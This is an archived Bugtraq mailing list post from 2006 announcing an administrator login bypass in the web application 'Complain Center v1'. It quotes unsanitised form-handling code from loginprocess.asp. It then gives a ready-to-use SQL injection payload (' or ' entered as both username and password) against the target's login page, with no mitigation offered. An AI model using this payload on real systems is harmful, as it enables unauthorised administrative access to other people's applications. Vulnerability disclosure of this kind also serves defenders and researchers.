Bugtraq mailing list archives
Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
From: ajannhwt () hotmail com
Date: 14 Sep 2006 20:02:01 -0000
ENGLISH # Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection # Author : ajann # Exploit; [CODE] loginprocess.asp: .. ... dim varUser dim varPass varUser=Request.Form("TxtUser") No Secure : ) varPass=Request.Form("TxtPass") No Secure : ) .. ... //Before join login page http://[target]/[path]/login.asp Username : ' or ' Password : ' or ' and Login Ok # ajann,Turkey
Current thread:
- Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection ajannhwt (Sep 15)